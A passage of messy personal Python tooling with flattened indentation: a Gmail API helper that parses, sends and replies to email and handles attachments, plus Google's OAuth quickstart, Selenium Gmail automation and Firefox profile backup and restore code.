msg_data['receiver'] = re.findall(r'<(.*)>', msg_data['receiver'])[0]
except:
pass
except:
try:
msg_data['receiver'] = keyequals('name', 'To', header_data)[0]['value']
except:
pass
emailer_name = or_list(lambda:findall(keyequals("name","From",header_data)[0]["value"],"(.*?) <.*?@.*?>")[0],lambda:findall(keyequals("name","From",header_data)[0]["value"],"^.*$")[0])
msg_data["emailer_name"] = emailer_name
try:
msg_data['subject'] = keyequals('name', 'Subject', header_data)[0]['value']
except:
print("header data")
print(header_data)
msg_data["subject"] = "No subject"
msg_data['date'] = or_list(lambda:keyequals('name', 'Received', header_data)[-1]['value'].split(';')[-1].strip(),lambda:keyequals("name","Date",header_data)[0]["value"])
if re.findall(r" \(.*?<.*?@.*?\.com.*?>.*?\)",msg_data["date"]):
msg_data["date"] = msg_data["date"].replace(re.findall(r" \(.*?<.*?@.*?\.com.*?>.*?\)",msg_data["date"])[0],"")
if re.findall(r"^from.*?HTTP.*?id .*? ",msg_data["date"]):
msg_data["date"] = msg_data["date"].replace(re.findall(r"^from.*?HTTP.*?id .*? ",msg_data["date"])[0],"")
msg_data["date"] = Date().parse_date(msg_data["date"],remove_tzinfo=True,localize_timezone=True)
try: msg_data['parts'] = initial_data['payload']['parts']
except: pass
pay = self.m.get(userId='me',id=msg['id'], format='raw').execute()
pay_2 = self.m.get(userId='me',id=msg['id'], format='full').execute()
import base64
message = base64.urlsafe_b64decode(pay['raw'].encode('ASCII')).decode("utf-8", "ignore")
message_2 = base64.urlsafe_b64decode(pay['raw'].encode('ASCII'))
msg_data["hidden_message"] = message
msg_data["hidden_message_2"] = message_2
msg_data["hidden_message_pay_raw"] = pay["raw"]
try:
msg_data["hidden_message_3"] = base64.urlsafe_b64decode(pay_2["payload"]["parts"][-1]["body"]["data"])
msg_data["hidden_message_3"] = (findall( msg_data["hidden_message_3"].encode(errors="ignore"),r"(?s)<.*>")[0]).encode() if msg_data["hidden_message_3"].encode(errors="ignore").startswith("<") else msg_data["hidden_message_3"]
except:
try:
msg_data["hidden_message_3"] = base64.urlsafe_b64decode(pay_2["payload"]["body"]["data"])
msg_data["hidden_message_3"] = (findall( msg_data["hidden_message_3"].encode(errors="ignore"),r"(?s)<.*>")[0]).encode() if msg_data["hidden_message_3"].encode(errors="ignore").startswith("<") else msg_data["hidden_message_3"]
except:
try:
msg_data["hidden_message_3"] = base64.urlsafe_b64decode(pay_2["payload"]["parts"][-1]["parts"][-1]["body"]["data"])
msg_data["hidden_message_3"] = (findall( msg_data["hidden_message_3"].encode(errors="ignore"),r"(?s)<.*>")[0]).encode() if msg_data["hidden_message_3"].encode(errors="ignore").startswith("<") else msg_data["hidden_message_3"]
except:
try:
rf=lmap(lambda i:base64.urlsafe_b64decode(i),findall(json.dumps(pay_2,indent=4),r'"data": ".*?"'))
rf=lmap(lambda i:i.decode(errors="ignore"), rf)
s=findall( ("\n\n\n".join(rf)).strip() , "(?s)<.*>" ) [ 0] if(tryprocess(lambda:findall( ("\n\n\n".join(rf)).strip() , "(?s)<.*>" ) [ 0])==1)else(("\n\n\n".join(rf)).strip())
s = s.encode()
#hidden_message_3 = SOUP(s).text
msg_data["hidden_message_3"] = s
except:
0/0
#if "Content-Type: text/plain" not in message:
# assert False
if "Content-Type: text/plain" in message:
content_types = re.findall(r"Content-Type:.*;", message)
scan_1 = re.findall(r"(?s)Content-Type: text/plain.*", message)[0]
content_types = re.findall(r"Content-Type:.*;", message)
scan_2 = None
if len(content_types) > 1:
try:scan_2 = re.findall(r"(?s)(Content-Type: text/plain.*)Content-Type", scan_1)[0]
except: scan_2 = scan_1
elif len(content_types) == 1:
scan_2 = scan_1
print("[tentative] re.sub urls. -- ")
scan_3 = re.sub(r"(?s)http.*? ","<url>", scan_2)
print("[morecleans] -- ")
scan_4 = re.sub(r"[\n]+", "\n", scan_3)
scan_5 = re.sub(r"(?s)Content-Type.*?\n","",scan_4)
scan_6 = re.sub(r"(?s)Content-Transfer-Encoding.*?\n","",scan_5)
scan_7 = re.sub(r"(?s)Mime-Version.*?\n","",scan_6)
scan_8 = re.sub(r"(?s)Date.*?\n","",scan_7)
scan_9 = re.sub(r"(?s)\n--.*","",scan_8)
scan_10 = scan_9.replace("\r", "\n")
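# Summary of the scan_1..scan_10 pipeline above: isolate the text/plain MIME part, replace
# URLs with "<url>", collapse repeated blank lines, strip Content-Type / Content-Transfer-Encoding /
# Mime-Version / Date header lines and the trailing MIME boundary, and normalise \r to \n.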
#print(scan_4)
msg_str = ("Subject: %s\n"%msg_data["subject"]) + scan_10
#msg_str = msg_str.replace("=", "")
#msg_str = BeautifulSoup(msg_str, 'lxml').text
#msg_str = msg_str[msg_str.find('From: '):]
#for i in range(25):
# msg_str = msg_str.replace('\n\n','\n').replace('\r','').replace('\t','').replace(' ',' ').replace(' \n','').replace('\n ','\n')
msg_data['message'] = msg_str
def save_message_as_emit(l):
locals().update(l)
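# NOTE: locals().update(l) does not rebind names inside a CPython function body, so the
# variables from `l` are not actually visible below; the call site is commented out anyway.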
an_emit = Emit()
if len(Emit.objects.filter(true_id=msg_data["id"])) == 1:
emit = Emit.objects.get(true_id=msg_data["id"])
print("found emit with true id of %s existing.." % msg_data["id"])
an_emit.direction = msg_data["direction"]
point_a = None
point_b = None
print(json.dumps(msg_data, indent=4))
if an_emit.direction == 0:
point_a = msg_data["receiver"]
point_b = msg_data["sender"]
elif an_emit.direction == 1:
#print("direction is 1, receiver is point_b")
point_a = msg_data["sender"]
point_b = msg_data["receiver"]
moment = None
try: moment = Date().myDatetimenow( datetime.strptime( re.findall(r"(.*) [+-]", msg_data["date"])[0].split(".")[0], "%a, %d %b %Y %H:%M:%S" ) , round_count = 6) # """ Out[6]: datetime.datetime(2018, 7, 30, 0, 38, 55)->18210.027025|datetime.datetime(2018, 7, 30, 0, 38, 56)->18210.027037 """
except Exception as e: redprint("error in setting moment for Emit... %s"%e) ; print(msg_data['date'])
print("moment: %s," % moment)
true_id = msg_data["id"]
payload = msg_data["message"]
print("saving an emit\n")
#print(json.dumps(an_emit.__dict__, indent=4))
an_emit.__dict__.update(locals())
true_ids.add(an_emit.true_id)
try:
print("saving an emit..")
an_emit.save()
except Exception as e:
an_emit = Emit.objects.get(true_id=an_emit.true_id)
#save_message_as_emit(l=locals())
msg_data.pop('parts', None)
messages.append(msg_data)
self.sent_messages = [i for i in messages if i.get("receiver",None)!=None and "SENT" in i["labelIds"]]
self.messages = [i for i in messages if i.get("receiver",None)!=None and "SENT" not in i["labelIds"]]
# receiver will default to None if emailer sends email to emailer.(self).{test}
for i in self.messages:
i = AttrDict(i)
#except Exception as e: # ._. - " (?) "
# print(e) # /> - > . <
# print("\n\n\n\n\nWHY IS THERE AN ERROR?")
# print(json.dumps(msg_data, indent=4))
# input("take this out when checked. why there is an errors . unknown errors here in Emailer.")
# errors += 1
except Exception as e:
redprint(e)
messages_in_without.append(msg_data)
self.messages_in_without = messages_in_without
messages_in_without2.append(msg)
self.messages_in_without2 = messages_in_without2
if tryprocess(lambda: self.messages) == 0:
self.messages = []
redprint(messages_in_without)
self.errors = messages_in_without
self.messages = [AttrDict(i) for i in self.messages]
#distinct_print(ordered_json_dumps(messages_in_without))
redprint("\n\n")
redprint(messages_in_without)
#distinct_print(ordered_json_dumps(messages_in_without))
print("%s errors" % errors)
print("%s true ids" % len(true_ids))
blueprint("%s messages, (%s+%s), errors:(%s)"%(len(data),(len(self.messages)),len(self.sent_messages),len(self.errors)))
redprint("This now updates to latest existing msg['id']")
return self.messages
def create_tickets_from_message(self, i):
i['date'] = i['date'].replace(' +', ' -')
i['date'] = i['date'].split(' -')[0]
i['date'] = i['date'].split('.')[0]
try:
i['datetime'] = datetime.strptime(i['date'], "%a, %d %b %Y %H:%M:%S")
except:
i['datetime'] = datetime.strptime(i['date'], "%d %b %Y %H:%M:%S")
i['text'] = i['message']
try:
email_accounts_in_message = [i['receiver'], i['sender']]
i['email'] = [j for j in email_accounts_in_message if 'support@' not in j][0]
except:
return
print("creating... \n%s"%i)
def set_attachments(self, subject=''):
filtered_messages = keyequals('subject', subject, self.messages)
filtered_messages = [i for i in filtered_messages if 'UNREAD' in i['labelIds']]
for msg_data in filtered_messages:
msg_data['attachments'] = []
for part in msg_data['parts']:
if '.csv' in part['filename'] or '.txt' in part['filename']:
attachmentId = part['body']['attachmentId']
attachment = self.a.get(userId='me', messageId=msg_data['id'], id=attachmentId).execute()
msg_data['attachments'].append({'filename': part['filename'],
'data': attachment['data']})
self.remove_labels(id=msg_data['id'], labels=['UNREAD'])
def dump_attachments(self, outdir='./'):
for msg_data in self.messages:
if 'attachments' in msg_data:
for attachment in msg_data['attachments']:
print('writing... %s' % outdir+attachment['filename'])
with open(outdir+attachment['filename'], 'wb') as f:
import base64
f.write(base64.urlsafe_b64decode(attachment['data'].encode('UTF-8')))
try: return outdir+attachment['filename']
except: return None
def reply_to_message(self, thread_id, msg):
ss = Browser()("sele")
ss.get("https://gmail.com")
ss.fcns('gbii')[-1].click()
print("discovering the slot")
BASE_EMAIL_STRING = "https://mail.google.com/mail/u/0/#inbox"
if ss.fcns("gb_Cb")[-1].text != self.user:
slot = None
users = ss.fcns("gb_Zb")
for idx, user_slot in enumerate(users):
print(user_slot.text.strip().replace(" (default)", ""))
if self.user == user_slot.text.strip().replace(" (default)", ""):
slot = user_slot
self.slot_idx = idx
BASE_EMAIL_STRING = "https://mail.google.com/mail/u/%s/#inbox" % self.slot_idx
thread_url = BASE_EMAIL_STRING + '/' + thread_id
print("getting %s" % thread_url)
ss.get(thread_url)
print("clicking open the last response box")
ss.fcns('bkH')[-1].click()
print("typing msg in boxbox..")
ss.ffs("div","contenteditable","true").send_keys(msg)
print("sending message...")
ss.fcns("L3")[-2].click()
print("sleeping .")
time.sleep(7)
ss.quit()
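# Note: reply_to_message drives the Gmail web UI through Selenium; the class names it clicks
# ('gbii', 'gb_Cb', 'gb_Zb', 'bkH', 'L3') are obfuscated Gmail CSS classes and can change
# whenever Google ships a new UI build, so treat this path as brittle.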
def get_major_thread_from_one_thread(self, thread_id):
threads = self.get_all_threads()
for thread in threads:
tdata = self.service.users().threads().get(userId="me", id=thread['id']).execute()
for i in tdata['messages']:
if i['id'] == thread_id:
print('match', thread['id'] == thread_id, "if matched True, then the mini thread Id you replied to was the Major one. ^-^")
print("but this requires extensive in depth testing. would recommend doing 1 by 1.")
def get_all_threads(self):
idx = 0
data = []
nextpagetoken = None
while True:
if nextpagetoken is not None:
threads = self.service.users().threads().list(userId='me', pageToken=nextpagetoken).execute()
else:
threads = self.service.users().threads().list(userId='me').execute()
print("getting more messages... idx: %s" % idx)
data.extend(threads.pop('threads', []))
if 'nextPageToken' not in threads.keys():
break
else:
nextpagetoken = threads['nextPageToken']
idx += 1
return data
def send_reply(self, msgHtml, threadId):
payload = self.m.get(userId='me',id=threadId).execute().get("payload")
headers = payload.get("headers")
headers_dict = dict(zip(key("name", headers), key("value", headers)))
msgHtml = msgHtml.replace("\n", "<br>")
references = []
for i in headers:
if i["name"] in ["In-Reply-To", "References", "Message-ID"]:
references.extend(i["value"].split(" "))
redprint(references)
references = " ".join(references)
redprint(references)
subject = headers_dict["Subject"]
print(headers_dict["From"])
to = re.findall("[a-z0-9]*@.*?\.[a-z0-9]*", headers_dict["From"])[0]
from_ = self.user
threadId = threadId
print("references: %s" % references)
print("subject: %s" % subject)
print("to: %s" % to)
print("from_: %s" % from_)
print("threadId: %s" % threadId)
msg = MIMEMultipart('alternative')
msg['Subject'] = subject
msg["To"] = to
msg['From'] = from_
msg['References'] = references  # RFC 2822 threading header; 'threadId' is not a MIME header
msg.attach(MIMEText(re.sub(r"<[^>]+>", "", msgHtml), 'plain'))  # plain-text alternative derived from the HTML body
msg.attach(MIMEText(msgHtml, 'html'))
import base64
raw = base64.urlsafe_b64encode(msg.as_bytes())
raw = raw.decode()
message = {'raw': raw, 'threadId': threadId}  # keep the reply in the original Gmail thread
sent_message = self.m.send(userId="me", body=message).execute()
print("sent message id: %s" % sent_message.get('id', "error"))
self.modify_as_read(id = threadId)
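# Threading sketch: Gmail keeps the reply in the same conversation only when the send body
# carries the original threadId and the MIME message reuses the thread's Subject and
# References/In-Reply-To ids, which is what the header handling above aims to do.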
def modify_as_read(self, id, star=True):
if star:
self.m.modify(userId="me", id=id, body={"addLabelIds": ["STARRED"], "removeLabelIds": ["UNREAD"]}).execute()
else:
self.m.modify(userId="me", id=id, body={"removeLabelIds": ["UNREAD"]}).execute()
def send_message(self, subject, to, msgHtml, threadId=None):
from email.mime.multipart import MIMEMultipart
msg = MIMEMultipart('alternative')
msg['Subject'] = subject
msg['To'] = to
msg['From'] = self.user
msg.attach(MIMEText(re.sub(r"<[^>]+>", "", msgHtml), 'plain'))  # plain-text alternative derived from the HTML body
msg.attach(MIMEText(msgHtml, 'html'))
import base64
raw = base64.urlsafe_b64encode(msg.as_bytes())
raw = raw.decode()
message = {'raw': raw}
try:
sent_message = self.m.send(userId="me", body=message).execute()
print(sent_message['id'])
return sent_message
except Exception as e:
print(e)
return str(e)
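# Usage sketch (hypothetical recipient):
#   self.send_message(subject="Hello", to="someone@example.com", msgHtml="<b>Hi there</b>")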
def send_message_with_attachment(self, subject, to, message_text='', file=''):
""" ::: the fat frog 2 ::: """
from email.mime.base import MIMEBase
from email.mime.image import MIMEImage
from email.mime.audio import MIMEAudio
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import mimetypes
message = MIMEMultipart()
message['to'] = to
# message['from'] = self.user
message['subject'] = subject
msg = MIMEText(message_text)
message.attach(msg)
content_type, encoding = mimetypes.guess_type(file)
#if content_type.split("/")[0] == 'text':
# redprint("text")
# fp = open(file, 'rb')
# msg = MIMEText(fp.read(), _subtype=content_type.split("/")[1]) # [AttributeError: 'bytes' object has no attribute 'encode']
# fp.close()
# filename = os.path.basename(file)
# msg.add_header('Content-Disposition', 'attachment', filename=filename)
# message.attach(msg)
if content_type is None or encoding is not None:
content_type = 'application/octet-stream'
main_type, sub_type = content_type.split('/', 1)
if content_type == "application/pdf":
main_type, sub_type = content_type.split("/")
fp = open(file, 'rb')
msg = MIMEBase(main_type, sub_type)
msg.set_payload(fp.read())
fp.close()
filename = os.path.basename(file)
import email.encoders
msg.add_header('Content-Disposition', 'attachment', filename=filename)
email.encoders.encode_base64(msg)
message.attach(msg)
elif content_type.split("/")[0] == 'image':
redprint("image")
fp = open(file, 'rb')
msg = MIMEImage(fp.read(), _subtype=content_type.split("/")[1])
fp.close()
filename = os.path.basename(file)
msg.add_header('Content-Disposition', 'attachment', filename=filename)
message.attach(msg)
elif content_type.split("/")[0] == 'audio':
redprint("audio")
fp = open(file, 'rb')
msg = MIMEAudio(fp.read(), _subtype=content_type.split("/")[1])
fp.close()
filename = os.path.basename(file)
msg.add_header('Content-Disposition', 'attachment', filename=filename)
message.attach(msg)
else:
redprint("elsed")
fp = open(file, 'rb')
msg = MIMEBase(content_type.split("/")[0], content_type.split("/")[1])
msg.set_payload(fp.read())
fp.close()
filename = os.path.basename(file)
msg.add_header('Content-Disposition', 'attachment', filename=filename)
message.attach(msg)
import base64
created_message = {'raw': base64.urlsafe_b64encode(message.as_bytes()).decode()}
sent_message = self.m.send(userId='me', body=created_message).execute()
print(sent_message)
return sent_message
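# Usage sketch (hypothetical file): the MIME part type is chosen from the guessed mimetype,
#   self.send_message_with_attachment("Report", "someone@example.com", "see attached", file="report.pdf")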
def failsafe_gmail_api_quickstart():
# below commented out
# from __future__ import print_function
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
# If modifying these scopes, delete the file token.pickle.
SCOPES = ['https://www.googleapis.com/auth/gmail.readonly']
def main():
"""Shows basic usage of the Gmail API.
Lists the user's Gmail labels.
"""
creds = None
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if os.path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'credentials.json', SCOPES)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)
service = build('gmail', 'v1', credentials=creds)
# Call the Gmail API
results = service.users().labels().list(userId='me').execute()
labels = results.get('labels', [])
if not labels:
print('No labels found.')
else:
print('Labels:')
for label in labels:
print(label['name'])
if __name__ == '__main__':
main()
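# Note: this mirrors Google's published Gmail API quickstart; token.pickle caches the OAuth
# credentials so the browser consent flow only has to run on the first invocation.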
class Explain_It(object):
def explain_it(self):
simplest_reason = input("simplest reason")
most_complicated_reason = input("most complicated reason")
reasons = [simplest_reason,most_complicated_reason]
while True:
reasons.insert(1,input("reasons going from simplest to most complicated"))
print(reasons)
class Firefox_Porter:
def __init__(self, io = None):
if Exists(io):
rm(GLOBAL_FIREFOX_PROFILE_PATH)
os.makedirs(GLOBAL_FIREFOX_PROFILE_PATH, exist_ok = False)
lmap(lambda i: os.system("/Applications/Firefox\ 46.app/Contents/MacOS/firefox-bin -CreateProfile %s" % i), lmap(lambda i: i.split(".")[-1], os.listdir(io)))
lmap(lambda i: os.system("rm -rf %s"%(Join("/",address_backslash(GLOBAL_FIREFOX_PROFILE_PATH),i,"*"))), os.listdir(GLOBAL_FIREFOX_PROFILE_PATH))
lmap(lambda i: os.system("cp -r %s %s" % (Join("/", io, i, "*"),Join("/",address_backslash(GLOBAL_FIREFOX_PROFILE_PATH),[j for j in os.listdir(GLOBAL_FIREFOX_PROFILE_PATH) if j.split(".")[-1]==i.split(".")[-1]][0],""))), os.listdir(io))
else:
io = (lmap(lambda i: i.split(".")[-1], os.listdir(GLOBAL_FIREFOX_PROFILE_PATH)))if(io==None)else(io)
io = lmap(lambda i: [j for j in os.listdir(GLOBAL_FIREFOX_PROFILE_PATH) if j.split(".")[-1]==i][0], io)
os.makedirs("Firefox_Port", exist_ok = False)
lmap(lambda i: os.system("cp -r '%s' '%s'" % (Join("/",GLOBAL_FIREFOX_PROFILE_PATH,i),Join("/","Firefox_Port",i))), io)
zipUtil("Firefox_Port")
"""
Firefox_Porter(io = None) # Port Out
redprint("\n".join(os.listdir("Firefox_Port")))
Firefox_Porter("Firefox_Port") # Port In
Firefox_Porter(io = ["sele2", "main_panels", "emails", "default"]) # Port One
redprint("\n".join(os.listdir("Firefox_Port")))
Firefox_Porter("Firefox_Port") # Port In
"""
class Firefox_Profile:
def __init__(self, profile):
[rm(Join("/", GLOBAL_FIREFOX_PROFILE_PATH, i)) for i in os.listdir(GLOBAL_FIREFOX_PROFILE_PATH) if i.split(".")[-1] == profile]
os.system("/Applications/Firefox\ 46.app/Contents/MacOS/firefox-bin -CreateProfile %s" % (profile))
R = [i for i in os.listdir(GLOBAL_FIREFOX_PROFILE_PATH) if i.split(".")[-1] == profile][0]
# open(Join("/", GLOBAL_FIREFOX_PROFILE_PATH, R, "prefs.js"), "w").write('// Mozilla User Preferences\n\n// DO NOT EDIT THIS FILE.\n//\n// If you make changes to this file while the application is running,\n// the changes will be overwritten when the application exits.\n//\n// To change a preference value, you can either:\n// - modify it via the UI (e.g. via about:config in the browser); or\n// - set it within a user.js file in your profile.\n\nuser_pref("app.normandy.first_run", false);\nuser_pref("app.normandy.user_id", "06ce59be-456c-b540-9a47-0941c6043180");\nuser_pref("app.update.auto", false);\nuser_pref("app.update.enabled", false);\nuser_pref("app.update.lastUpdateTime.addon-background-update-timer", 0);\nuser_pref("app.update.lastUpdateTime.background-update-timer", 1550635354);\nuser_pref("app.update.lastUpdateTime.blocklist-background-update-timer", 0);\nuser_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1550633597);\nuser_pref("app.update.lastUpdateTime.recipe-client-addon-run", 0);\nuser_pref("app.update.lastUpdateTime.search-engine-update-timer", 1550635039);\nuser_pref("app.update.lastUpdateTime.services-settings-poll-changes", 1550635420);\nuser_pref("app.update.lastUpdateTime.telemetry_modules_ping", 0);\nuser_pref("app.update.lastUpdateTime.xpi-signature-verification", 0);\nuser_pref("browser.bookmarks.restore_default_bookmarks", false);\nuser_pref("browser.cache.disk.capacity", 1048576);\nuser_pref("browser.cache.disk.filesystem_reported", 1);\nuser_pref("browser.cache.disk.smart_size.first_run", false);\nuser_pref("browser.cache.disk.smart_size.use_old_max", false);\nuser_pref("browser.cache.frecency_experiment", 1);\nuser_pref("browser.contentblocking.category", "standard");\nuser_pref("browser.download.importedFromSqlite", true);\nuser_pref("browser.laterrun.bookkeeping.profileCreationTime", 1550633567);\nuser_pref("browser.laterrun.bookkeeping.sessionCount", 12);\nuser_pref("browser.laterrun.enabled", true);\nuser_pref("browser.migrated-sync-button", true);\nuser_pref("browser.migration.version", 77);\nuser_pref("browser.newtabpage.activity-stream.feeds.section.highlights", false);\nuser_pref("browser.newtabpage.activity-stream.feeds.section.topstories", false);\nuser_pref("browser.newtabpage.activity-stream.feeds.section.topstories.rec.impressions", "{"34054":1550633569243,"34079":1550633569243,"34084":1550633569243}");\nuser_pref("browser.newtabpage.activity-stream.feeds.section.topstories.spoc.impressions", "{"787":[1550634723461,1550634727923,1550634732355],"1099":[1550635011420]}");\nuser_pref("browser.newtabpage.activity-stream.feeds.snippets", false);\nuser_pref("browser.newtabpage.activity-stream.feeds.topsites", false);\nuser_pref("browser.newtabpage.activity-stream.impressionId", "{c85341b3-f663-9243-bac9-83b8e7427423}");\nuser_pref("browser.newtabpage.activity-stream.migrationLastShownDate", 1550552400);\nuser_pref("browser.newtabpage.activity-stream.migrationRemainingDays", 3);\nuser_pref("browser.newtabpage.activity-stream.prerender", false);\nuser_pref("browser.newtabpage.activity-stream.section.highlights.includeBookmarks", false);\nuser_pref("browser.newtabpage.activity-stream.section.highlights.includeDownloads", false);\nuser_pref("browser.newtabpage.activity-stream.section.highlights.includePocket", false);\nuser_pref("browser.newtabpage.activity-stream.section.highlights.includeVisited", false);\nuser_pref("browser.newtabpage.activity-stream.showSearch", false);\nuser_pref("browser.newtabpage.activity-stream.showSponsored", 
false);\nuser_pref("browser.newtabpage.enhanced", true);\nuser_pref("browser.newtabpage.storageVersion", 1);\nuser_pref("browser.pageActions.persistedActions", "{"version":1,"ids":["bookmark","bookmarkSeparator","copyURL","emailLink","addSearchEngine","sendToDevice","shareURL","pocket","screenshots_mozilla_org"],"idsInUrlbar":["pocket","bookmark"]}");\nuser_pref("browser.pagethumbnails.storage_version", 3);\nuser_pref("browser.places.smartBookmarksVersion", 7);\nuser_pref("browser.preferences.advanced.selectedTabIndex", 0);\nuser_pref("browser.rights.3.shown", true);\nuser_pref("browser.safebrowsing.provider.google4.lastupdatetime", "1550635400587");\nuser_pref("browser.safebrowsing.provider.google4.nextupdatetime", "1550637198587");\nuser_pref("browser.safebrowsing.provider.mozilla.lastupdatetime", "1550633571752");\nuser_pref("browser.safebrowsing.provider.mozilla.nextupdatetime", "1550637171752");\nuser_pref("browser.search.cohort", "nov17-2");\nuser_pref("browser.search.countryCode", "US");\nuser_pref("browser.search.region", "US");\nuser_pref("browser.sessionstore.upgradeBackup.latestBuildID", "20190211233335");\nuser_pref("browser.shell.checkDefaultBrowser", false);\nuser_pref("browser.shell.didSkipDefaultBrowserCheckOnFirstRun", true);\nuser_pref("browser.slowStartup.averageTime", 855);\nuser_pref("browser.slowStartup.samples", 1);\nuser_pref("browser.startup.homepage_override.buildID", "20190211233335");\nuser_pref("browser.startup.homepage_override.mstone", "65.0.1");\nuser_pref("browser.uiCustomization.state", "{"placements":{"widget-overflow-fixed-list":[],"nav-bar":["back-button","forward-button","stop-reload-button","home-button","customizableui-special-spring1","urlbar-container","customizableui-special-spring2","downloads-button","library-button","sidebar-button","loop-button"],"TabsToolbar":["tabbrowser-tabs","new-tab-button","alltabs-button"],"PersonalToolbar":["personal-bookmarks"]},"seen":["developer-button","loop-button","pocket-button","feed-button"],"dirtyAreaCache":["nav-bar","TabsToolbar","PersonalToolbar"],"currentVersion":15,"newElementCount":2}");\nuser_pref("browser.urlbar.placeholderName", "Google");\nuser_pref("browser.urlbar.timesBeforeHidingSuggestionsHint", 2);\nuser_pref("datareporting.healthreport.uploadEnabled", false);\nuser_pref("datareporting.policy.dataSubmissionPolicyAcceptedVersion", 2);\nuser_pref("datareporting.policy.dataSubmissionPolicyNotifiedTime", "1550633570624");\nuser_pref("datareporting.sessions.current.activeTicks", 7);\nuser_pref("datareporting.sessions.current.clean", true);\nuser_pref("datareporting.sessions.current.firstPaint", 664);\nuser_pref("datareporting.sessions.current.main", 73);\nuser_pref("datareporting.sessions.current.sessionRestored", 2511);\nuser_pref("datareporting.sessions.current.startTime", "1550633939369");\nuser_pref("datareporting.sessions.current.totalTime", 37);\nuser_pref("devtools.onboarding.telemetry.logged", true);\nuser_pref("distribution.iniFile.exists.appversion", "65.0.1");\nuser_pref("distribution.iniFile.exists.value", false);\nuser_pref("dom.apps.reset-permissions", true);\nuser_pref("dom.forms.autocomplete.formautofill", true);\nuser_pref("dom.mozApps.used", true);\nuser_pref("e10s.rollout.cohort", "unsupportedChannel");\nuser_pref("experiments.activeExperiment", false);\nuser_pref("extensions.blocklist.pingCountVersion", -1);\nuser_pref("extensions.bootstrappedAddons", 
"{"firefox@getpocket.com":{"version":"1.0","type":"extension","descriptor":"/Applications/Firefox.app/Contents/Resources/browser/features/firefox@getpocket.com.xpi","multiprocessCompatible":false,"runInSafeMode":true},"loop@mozilla.org":{"version":"1.2.6","type":"extension","descriptor":"/Applications/Firefox.app/Contents/Resources/browser/features/loop@mozilla.org.xpi","multiprocessCompatible":false,"runInSafeMode":true},"e10srollout@mozilla.org":{"version":"1.0","type":"extension","descriptor":"/Applications/Firefox.app/Contents/Resources/browser/features/e10srollout@mozilla.org.xpi","multiprocessCompatible":false,"runInSafeMode":true}}");\nuser_pref("extensions.databaseSchema", 28);\nuser_pref("extensions.e10sBlockedByAddons", false);\nuser_pref("extensions.enabledAddons", "%7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:46.0");\nuser_pref("extensions.getAddons.cache.lastUpdate", 1550633941);\nuser_pref("extensions.getAddons.databaseSchema", 5);\nuser_pref("extensions.lastAppBuildId", "20190211233335");\nuser_pref("extensions.lastAppVersion", "65.0.1");\nuser_pref("extensions.lastPlatformVersion", "65.0.1");\nuser_pref("extensions.pendingOperations", false);\nuser_pref("extensions.systemAddonSet", "{"schema":1,"addons":{}}");\nuser_pref("extensions.webcompat.perform_injections", true);\nuser_pref("extensions.webcompat.perform_ua_overrides", true);\nuser_pref("extensions.webextensions.uuids", "{"formautofill@mozilla.org":"2b4f0ede-b4d9-6545-9ac0-e1660f03296f","screenshots@mozilla.org":"a1a637bf-7c5f-f446-908f-d12e4f77d811","webcompat-reporter@mozilla.org":"9bf34646-9ad4-954f-9c4e-1063d8c70d25","webcompat@mozilla.org":"b79d04e0-3f7f-3b44-a76a-3cdbecb89a81"}");\nuser_pref("extensions.xpiState", "{"app-system-defaults":{"firefox@getpocket.com":{"d":"/Applications/Firefox.app/Contents/Resources/browser/features/firefox@getpocket.com.xpi","e":true,"v":"1.0","st":1540071218000},"loop@mozilla.org":{"d":"/Applications/Firefox.app/Contents/Resources/browser/features/loop@mozilla.org.xpi","e":true,"v":"1.2.6","st":1540071218000},"e10srollout@mozilla.org":{"d":"/Applications/Firefox.app/Contents/Resources/browser/features/e10srollout@mozilla.org.xpi","e":true,"v":"1.0","st":1540071218000}},"app-global":{"{972ce4c6-7e08-4474-a285-3208198ce6fd}":{"d":"/Applications/Firefox.app/Contents/Resources/browser/extensions/{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi","e":true,"v":"46.0","st":1540071218000}}}");\nuser_pref("font.internaluseonly.changed", true);\nuser_pref("gecko.buildID", "20160421124000");\nuser_pref("gecko.mstone", "46.0");\nuser_pref("lightweightThemes.persisted.headerURL", false);\nuser_pref("lightweightThemes.usedThemes", "[]");\nuser_pref("media.gmp.storage.version.observed", 1);\nuser_pref("network.cookie.prefsMigrated", true);\nuser_pref("network.predictor.cleaned-up", true);\nuser_pref("pdfjs.enabledCache.state", false);\nuser_pref("pdfjs.migrationVersion", 2);\nuser_pref("pdfjs.previousHandler.alwaysAskBeforeHandling", true);\nuser_pref("pdfjs.previousHandler.preferredAction", 4);\nuser_pref("places.history.expiration.transient_current_max_pages", 112348);\nuser_pref("plugin.disable_full_page_plugin_for_types", "application/pdf");\nuser_pref("privacy.cpd.offlineApps", true);\nuser_pref("privacy.cpd.siteSettings", true);\nuser_pref("privacy.sanitize.migrateClearSavedPwdsOnExit", true);\nuser_pref("privacy.sanitize.pending", "[{"id":"newtab-container","itemsToClear":[],"options":{}}]");\nuser_pref("privacy.sanitize.timeSpan", 0);\nuser_pref("security.sandbox.content.tempDirSuffix", 
